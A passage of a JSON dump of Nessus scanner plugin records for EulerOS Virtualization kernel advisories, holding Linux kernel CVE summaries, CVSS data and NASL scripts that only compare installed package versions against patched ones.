rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-124.27.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-124.27.1.el6uek\")) flag++;\n\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-4.1.12-124.27.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-4.1.12-124.27.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-4.1.12-124.27.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-4.1.12-124.27.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-4.1.12-124.27.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-4.1.12\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-4.1.12-124.27.1.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2021-01-07T08:56:52", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - In the Linux kernel 
through 4.14.13, the\n rds_message_alloc_sgs() function does not validate a\n value that is used during DMA page allocation, leading\n to a heap-based out-of-bounds write (related to the\n rds_rdma_extra_size() function in 'net/rds/rdma.c') and\n thus to a system panic. Due to the nature of the flaw,\n privilege escalation cannot be fully ruled out,\n although we believe it is unlikely.(CVE-2018-5332)\n\n - In the Linux kernel through 4.14.13, the\n rds_cmsg_atomic() function in 'net/rds/rdma.c'\n mishandles cases where page pinning fails or an invalid\n address is supplied by a user. This can lead to a NULL\n pointer dereference in rds_atomic_free_op() and thus to\n a system panic.(CVE-2018-5333)\n\n - A flaw was found in the Linux kernel's handling of\n loopback devices. An attacker, who has permissions to\n setup loopback disks, may create a denial of service or\n other unspecified actions.(CVE-2018-5344)\n\n - The acpi_smbus_hc_add function in drivers/acpi/sbshc.c\n in the Linux kernel, through 4.14.15, allows local\n users to obtain sensitive address information by\n reading dmesg data from an SBS HC printk\n call.(CVE-2018-5750)\n\n - The futex_requeue function in kernel/futex.c in the\n Linux kernel, before 4.14.15, might allow attackers to\n cause a denial of service (integer overflow) or\n possibly have unspecified other impacts by triggering a\n negative wake or requeue value. 
Due to the nature of\n the flaw, privilege escalation cannot be fully ruled\n out, although we believe it is unlikely.(CVE-2018-6927)\n\n - Memory leak in the sas_smp_get_phy_events function in\n drivers/scsi/libsas/sas_expander.c in the Linux kernel\n allows local users to cause a denial of service (kernel\n memory exhaustion) via multiple read accesses to files\n in the /sys/class/sas_phy directory.(CVE-2018-7757)\n\n - An integer overflow vulnerability was discovered in\n the Linux kernel, from version 3.4 through 4.15, in the\n drivers/gpu/drm/udl/udl_fb.c:udl_fb_mmap() function. An\n attacker with access to the udldrmfb driver could\n exploit this to obtain full read and write permissions\n on kernel physical pages, resulting in a code execution\n in kernel space.(CVE-2018-8781)\n\n - A flaw was found in the way the Linux KVM module\n processed the trap flag(TF) bit in EFLAGS during\n emulation of the syscall instruction, which leads to a\n debug exception(#DB) being raised in the guest stack. A\n user/process inside a guest could use this flaw to\n potentially escalate their privileges inside the guest.\n Linux guests are not affected by this.(CVE-2017-7518)\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.(CVE-2017-18360)\n\n - It was found that the Linux kernel can hit a BUG_ON()\n statement in the __xfs_get_blocks() in the\n fs/xfs/xfs_aops.c because of a race condition between\n direct and memory-mapped I/O associated with a hole in\n a file that is handled with BUG_ON() instead of an I/O\n failure. 
This allows a local unprivileged attacker to\n cause a system crash and a denial of\n service.(CVE-2016-10741)\n\n - Since Linux kernel version 3.2, the mremap() syscall\n performs TLB flushes after dropping pagetable locks. If\n a syscall such as ftruncate() removes entries from the\n pagetables of a task that is in the middle of mremap(),\n a stale TLB entry can remain for a short time that\n permits access to a physical page after it has been\n released back to the page allocator and reused. This is\n fixed in the following kernel versions: 4.9.135,\n 4.14.78, 4.18.16, 4.19.(CVE-2018-18281)\n\n - An issue was discovered in the proc_pid_stack function\n in fs/proc/base.c in the Linux kernel. An attacker with\n a local account can trick the stack unwinder code to\n leak stack contents to userspace. The fix allows only\n root to inspect the kernel stack of an arbitrary\n task.(CVE-2018-17972)\n\n - An issue was discovered in can_can_gw_rcv in\n net/can/gw.c in the Linux kernel through 4.19.13. The\n CAN frame modification rules allow bitwise logical\n operations that can be also applied to the can_dlc\n field. Because of a missing check, the CAN drivers may\n write arbitrary content beyond the data registers in\n the CAN controller's I/O memory when processing can-gw\n manipulated outgoing frames. This is related to\n cgw_csum_xor_rel. 
An unprivileged user can trigger a\n system crash (general protection fault).(CVE-2019-3701)\n\n - A flaw was found in the Linux kernel, through version\n 4.19.6, where a local user could exploit a\n use-after-free in the ALSA driver by supplying a\n malicious USB Sound device (with zero interfaces) that\n is mishandled in usb_audio_probe in sound/usb/card.c.\n An attacker could corrupt memory and possibly escalate\n privileges if the attacker is able to have physical\n access to the system.(CVE-2018-19824)\n\n - A security flaw was found in the Linux kernel in a way\n that the cleancache subsystem clears an inode after the\n final file truncation (removal). The new file created\n with the same inode may contain leftover pages from\n cleancache and the old file data instead of the new\n one.(CVE-2018-16862)\n\n - A use-after-free flaw can occur in the Linux kernel due\n to a race condition between packet_do_bind() and\n packet_notifier() functions called for an AF_PACKET\n socket. An unprivileged, local user could use this flaw\n to induce kernel memory corruption on the system,\n leading to an unresponsive system or to a crash. Due to\n the nature of the flaw, privilege escalation cannot be\n fully ruled out.(CVE-2018-18559)\n\n - A new software page cache side channel attack scenario\n was discovered in operating systems that implement the\n very common 'page cache' caching mechanism. A malicious\n user/process could use 'in memory' page-cache knowledge\n to infer access timings to shared memory and gain\n knowledge which can be used to reduce effectiveness of\n cryptographic strength by monitoring algorithmic\n behavior, infer access patterns of memory to determine\n code paths taken, and exfiltrate data to a blinded\n attacker through page-granularity access times as a\n side-channel.(CVE-2019-5489)\n\n - A flaw was found in mmap in the Linux kernel allowing\n the process to map a null page. 
This allows attackers\n to abuse this mechanism to turn null pointer\n dereferences into workable exploits.(CVE-2019-9213)\n\n - A flaw named FragmentSmack was found in the way the\n Linux kernel handled reassembly of fragmented IPv4 and\n IPv6 packets. A remote attacker could use this flaw to\n trigger time and calculation expensive fragment\n reassembly algorithm by sending specially crafted\n packets which could lead to a CPU saturation and hence\n a denial of service on the system.(CVE-2018-5391)\n\n - An issue was discovered in the Linux kernel through\n 4.19. An information leak in cdrom_ioctl_select_disc in\n drivers/cdrom/cdrom.c could be used by local attackers\n to read kernel memory because a cast from unsigned long\n to int interferes with bounds checking.(CVE-2018-18710)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 20, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1512)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5333", "CVE-2018-19824", "CVE-2017-7518", "CVE-2016-10741", "CVE-2018-5344", "CVE-2018-6927", "CVE-2018-7757", "CVE-2018-16862", "CVE-2018-8781", "CVE-2018-5391", "CVE-2018-18710", "CVE-2018-18281", "CVE-2018-5332", "CVE-2018-18559", "CVE-2019-3701", "CVE-2018-17972", "CVE-2017-18360", "CVE-2019-9213", "CVE-2018-5750", "CVE-2019-5489"], "modified": "2019-05-13T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", 
"p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1512.NASL", "href": "https://www.tenable.com/plugins/nessus/124834", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124834);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2016-10741\",\n \"CVE-2017-18360\",\n \"CVE-2017-7518\",\n \"CVE-2018-16862\",\n \"CVE-2018-17972\",\n \"CVE-2018-18281\",\n \"CVE-2018-18559\",\n \"CVE-2018-18710\",\n \"CVE-2018-19824\",\n \"CVE-2018-5332\",\n \"CVE-2018-5333\",\n \"CVE-2018-5344\",\n \"CVE-2018-5391\",\n \"CVE-2018-5750\",\n \"CVE-2018-6927\",\n \"CVE-2018-7757\",\n \"CVE-2018-8781\",\n \"CVE-2019-3701\",\n \"CVE-2019-5489\",\n \"CVE-2019-9213\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1512)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - In the Linux kernel through 4.14.13, the\n rds_message_alloc_sgs() function does not validate a\n value that is used during DMA page allocation, leading\n to a heap-based out-of-bounds write (related to the\n rds_rdma_extra_size() function in 'net/rds/rdma.c') and\n thus to a system panic. 
Due to the nature of the flaw,\n privilege escalation cannot be fully ruled out,\n although we believe it is unlikely.(CVE-2018-5332)\n\n - In the Linux kernel through 4.14.13, the\n rds_cmsg_atomic() function in 'net/rds/rdma.c'\n mishandles cases where page pinning fails or an invalid\n address is supplied by a user. This can lead to a NULL\n pointer dereference in rds_atomic_free_op() and thus to\n a system panic.(CVE-2018-5333)\n\n - A flaw was found in the Linux kernel's handling of\n loopback devices. An attacker, who has permissions to\n setup loopback disks, may create a denial of service or\n other unspecified actions.(CVE-2018-5344)\n\n - The acpi_smbus_hc_add function in drivers/acpi/sbshc.c\n in the Linux kernel, through 4.14.15, allows local\n users to obtain sensitive address information by\n reading dmesg data from an SBS HC printk\n call.(CVE-2018-5750)\n\n - The futex_requeue function in kernel/futex.c in the\n Linux kernel, before 4.14.15, might allow attackers to\n cause a denial of service (integer overflow) or\n possibly have unspecified other impacts by triggering a\n negative wake or requeue value. Due to the nature of\n the flaw, privilege escalation cannot be fully ruled\n out, although we believe it is unlikely.(CVE-2018-6927)\n\n - Memory leak in the sas_smp_get_phy_events function in\n drivers/scsi/libsas/sas_expander.c in the Linux kernel\n allows local users to cause a denial of service (kernel\n memory exhaustion) via multiple read accesses to files\n in the /sys/class/sas_phy directory.(CVE-2018-7757)\n\n - An integer overflow vulnerability was discovered in\n the Linux kernel, from version 3.4 through 4.15, in the\n drivers/gpu/drm/udl/udl_fb.c:udl_fb_mmap() function. 
An\n attacker with access to the udldrmfb driver could\n exploit this to obtain full read and write permissions\n on kernel physical pages, resulting in a code execution\n in kernel space.(CVE-2018-8781)\n\n - A flaw was found in the way the Linux KVM module\n processed the trap flag(TF) bit in EFLAGS during\n emulation of the syscall instruction, which leads to a\n debug exception(#DB) being raised in the guest stack. A\n user/process inside a guest could use this flaw to\n potentially escalate their privileges inside the guest.\n Linux guests are not affected by this.(CVE-2017-7518)\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.(CVE-2017-18360)\n\n - It was found that the Linux kernel can hit a BUG_ON()\n statement in the __xfs_get_blocks() in the\n fs/xfs/xfs_aops.c because of a race condition between\n direct and memory-mapped I/O associated with a hole in\n a file that is handled with BUG_ON() instead of an I/O\n failure. This allows a local unprivileged attacker to\n cause a system crash and a denial of\n service.(CVE-2016-10741)\n\n - Since Linux kernel version 3.2, the mremap() syscall\n performs TLB flushes after dropping pagetable locks. If\n a syscall such as ftruncate() removes entries from the\n pagetables of a task that is in the middle of mremap(),\n a stale TLB entry can remain for a short time that\n permits access to a physical page after it has been\n released back to the page allocator and reused. This is\n fixed in the following kernel versions: 4.9.135,\n 4.14.78, 4.18.16, 4.19.(CVE-2018-18281)\n\n - An issue was discovered in the proc_pid_stack function\n in fs/proc/base.c in the Linux kernel. 
An attacker with\n a local account can trick the stack unwinder code to\n leak stack contents to userspace. The fix allows only\n root to inspect the kernel stack of an arbitrary\n task.(CVE-2018-17972)\n\n - An issue was discovered in can_can_gw_rcv in\n net/can/gw.c in the Linux kernel through 4.19.13. The\n CAN frame modification rules allow bitwise logical\n operations that can be also applied to the can_dlc\n field. Because of a missing check, the CAN drivers may\n write arbitrary content beyond the data registers in\n the CAN controller's I/O memory when processing can-gw\n manipulated outgoing frames. This is related to\n cgw_csum_xor_rel. An unprivileged user can trigger a\n system crash (general protection fault).(CVE-2019-3701)\n\n - A flaw was found in the Linux kernel, through version\n 4.19.6, where a local user could exploit a\n use-after-free in the ALSA driver by supplying a\n malicious USB Sound device (with zero interfaces) that\n is mishandled in usb_audio_probe in sound/usb/card.c.\n An attacker could corrupt memory and possibly escalate\n privileges if the attacker is able to have physical\n access to the system.(CVE-2018-19824)\n\n - A security flaw was found in the Linux kernel in a way\n that the cleancache subsystem clears an inode after the\n final file truncation (removal). The new file created\n with the same inode may contain leftover pages from\n cleancache and the old file data instead of the new\n one.(CVE-2018-16862)\n\n - A use-after-free flaw can occur in the Linux kernel due\n to a race condition between packet_do_bind() and\n packet_notifier() functions called for an AF_PACKET\n socket. An unprivileged, local user could use this flaw\n to induce kernel memory corruption on the system,\n leading to an unresponsive system or to a crash. 
Due to\n the nature of the flaw, privilege escalation cannot be\n fully ruled out.(CVE-2018-18559)\n\n - A new software page cache side channel attack scenario\n was discovered in operating systems that implement the\n very common 'page cache' caching mechanism. A malicious\n user/process could use 'in memory' page-cache knowledge\n to infer access timings to shared memory and gain\n knowledge which can be used to reduce effectiveness of\n cryptographic strength by monitoring algorithmic\n behavior, infer access patterns of memory to determine\n code paths taken, and exfiltrate data to a blinded\n attacker through page-granularity access times as a\n side-channel.(CVE-2019-5489)\n\n - A flaw was found in mmap in the Linux kernel allowing\n the process to map a null page. This allows attackers\n to abuse this mechanism to turn null pointer\n dereferences into workable exploits.(CVE-2019-9213)\n\n - A flaw named FragmentSmack was found in the way the\n Linux kernel handled reassembly of fragmented IPv4 and\n IPv6 packets. A remote attacker could use this flaw to\n trigger time and calculation expensive fragment\n reassembly algorithm by sending specially crafted\n packets which could lead to a CPU saturation and hence\n a denial of service on the system.(CVE-2018-5391)\n\n - An issue was discovered in the Linux kernel through\n 4.19. An information leak in cdrom_ioctl_select_disc in\n drivers/cdrom/cdrom.c could be used by local attackers\n to read kernel memory because a cast from unsigned long\n to int interferes with bounds checking.(CVE-2018-18710)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1512\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e89fa9cc\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8781\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-862.14.1.6_42\",\n \"kernel-devel-3.10.0-862.14.1.6_42\",\n \"kernel-headers-3.10.0-862.14.1.6_42\",\n \"kernel-tools-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-devel-3.10.0-862.14.1.6_42\",\n \"perf-3.10.0-862.14.1.6_42\",\n 
\"python-perf-3.10.0-862.14.1.6_42\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:55:52", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - drivers/hid/hid-zpff.c in the Human Interface Device\n (HID) subsystem in the Linux kernel through 3.11, when\n CONFIG_HID_ZEROPLUS is enabled, allows physically\n proximate attackers to cause a denial of service\n (heap-based out-of-bounds write) via a crafted\n device.(CVE-2013-2889)\n\n - The capabilities implementation in the Linux kernel\n before 3.14.8 does not properly consider that\n namespaces are inapplicable to inodes, which allows\n local users to bypass intended chmod restrictions by\n first creating a user namespace, as demonstrated by\n setting the setgid bit on a file with group ownership\n of root.(CVE-2014-4014)\n\n - The function drivers/usb/core/config.c in the Linux\n kernel, allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB device,\n related to the USB_DT_INTERFACE_ASSOCIATION\n descriptor.(CVE-2017-16531)\n\n - The snd_timer_interrupt function in sound/core/timer.c\n in the Linux kernel before 4.4.1 does not properly\n maintain a certain linked list, which allows local\n users to cause a denial of service (race condition and\n system crash) via a crafted ioctl\n call.(CVE-2016-2545)\n\n - A flaw was found in the Linux kernel 
where the deletion\n of a file or directory could trigger an unmount and\n reveal data under a mount point. This flaw was\n inadvertently introduced with the new feature of being\n able to lazily unmount a mount tree when using file\n system user namespaces.(CVE-2015-4176)\n\n - The do_shmat function in ipc/shm.c in the Linux kernel,\n through 4.9.12, does not restrict the address\n calculated by a certain rounding operation. This allows\n privileged local users to map page zero and,\n consequently, bypass a protection mechanism that exists\n for the mmap system call. This is possible by making\n crafted shmget and shmat system calls in a privileged\n context.(CVE-2017-5669)\n\n - In drivers/net/ethernet/hisilicon/hns/hns_enet.c in the\n Linux kernel, before 4.13, local users can cause a\n denial of service (use-after-free and BUG) or possibly\n have unspecified other impact by leveraging differences\n in skb handling between hns_nic_net_xmit_hw and\n hns_nic_net_xmit.(CVE-2017-18218)\n\n - The ioapic_deliver function in virt/kvm/ioapic.c in the\n Linux kernel through 3.14.1 does not properly validate\n the kvm_irq_delivery_to_apic return value, which allows\n guest OS users to cause a denial of service (host OS\n crash) via a crafted entry in the redirection table of\n an I/O APIC. 
NOTE: the affected code was moved to the\n ioapic_service function before the vulnerability was\n announced.(CVE-2014-0155)\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2013-7421)\n\n - Off-by-one error in the get_prng_bytes function in\n crypto/ansi_cprng.c in the Linux kernel through 3.11.4\n makes it easier for context-dependent attackers to\n defeat cryptographic protection mechanisms via multiple\n requests for small amounts of data, leading to improper\n management of the state of the consumed\n data.(CVE-2013-4345)\n\n - sound/core/timer.c in the Linux kernel before 4.4.1\n uses an incorrect type of mutex, which allows local\n users to cause a denial of service (race condition,\n use-after-free, and system crash) via a crafted ioctl\n call.(CVE-2016-2546)\n\n - The do_get_mempolicy function in mm/mempolicy.c in the\n Linux kernel before 4.12.9 allows local users to cause\n a denial of service (use-after-free) or possibly have\n unspecified other impact via crafted system\n calls.(CVE-2018-10675)\n\n - A certain backport in the TCP Fast Open implementation\n for the Linux kernel before 3.18 does not properly\n maintain a count value, which allows local users to\n cause a denial of service (system crash) via the Fast\n Open feature, as demonstrated by visiting the\n chrome://flags/#enable-tcp-fast-open URL when using\n certain 3.10.x through 3.16.x kernel builds, including\n longterm-maintenance releases and ckt (aka Canonical\n Kernel Team) builds.(CVE-2015-3332)\n\n - It was found that the try_to_unmap_cluster() function\n in the Linux kernel's Memory Management subsystem did\n not properly handle page locking in certain cases,\n which could potentially trigger the BUG_ON() macro in\n the mlock_vma_page() function. 
A local, unprivileged\n user could use this flaw to crash the\n system.(CVE-2014-3122)\n\n - The blkcg_init_queue function in block/blk-cgroup.c in\n the Linux kernel, before 4.11, allows local users to\n cause a denial of service (double free) or possibly\n have unspecified other impact by triggering a creation\n failure.(CVE-2018-7480)\n\n - The create_fixed_stream_quirk function in\n sound/usb/quirks.c in the snd-usb-audio driver in the\n Linux kernel before 4.5.1 allows physically proximate\n attackers to cause a denial of service (NULL pointer\n dereference or double free, and system crash) via a\n crafted endpoints value in a USB device\n descriptor.(CVE-2016-2184)\n\n - The etm_setup_aux function in\n drivers/hwtracing/coresight/coresight-etm-perf.c in the\n Linux kernel before 4.10.2 allows attackers to cause a\n denial of service (panic) because a parameter is\n incorrectly used as a local variable.(CVE-2018-11232)\n\n - A division-by-zero in set_termios(), when debugging is\n enabled, was found in the Linux kernel. When the\n [io_ti] driver is loaded, a local unprivileged attacker\n can request incorrect high transfer speed in the\n change_port_settings() in the\n drivers/usb/serial/io_ti.c so that the divisor value\n becomes zero and causes a system crash resulting in a\n denial of service.(CVE-2017-18360)\n\n - A flaw was found where the XFS filesystem code\n mishandles a user-settable inode flag in the Linux\n kernel prior to 4.14-rc1. This can cause a local denial\n of service via a kernel panic.(CVE-2017-14340)\n\n - An issue was discovered in the Linux kernel through\n 4.19. 
An information leak in cdrom_ioctl_select_disc in\n drivers/cdrom/cdrom.c could be used by local attackers\n to read kernel memory because a cast from unsigned long\n to int interferes with bounds\n checking.(CVE-2018-18710)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 14, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1471)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3122", "CVE-2013-4345", "CVE-2014-0155", "CVE-2015-4176", "CVE-2015-3332", "CVE-2018-11232", "CVE-2018-10675", "CVE-2014-4014", "CVE-2016-2184", "CVE-2018-18710", "CVE-2017-18218", "CVE-2017-14340", "CVE-2016-2545", "CVE-2013-7421", "CVE-2017-5669", "CVE-2017-18360", "CVE-2016-2546", "CVE-2017-16531", "CVE-2018-7480", "CVE-2013-2889"], "modified": "2019-05-13T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-devel", "cpe:/o:huawei:euleros:uvp:3.0.1.0", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs"], "id": "EULEROS_SA-2019-1471.NASL", "href": "https://www.tenable.com/plugins/nessus/124795", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124795);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2013-2889\",\n \"CVE-2013-4345\",\n \"CVE-2013-7421\",\n 
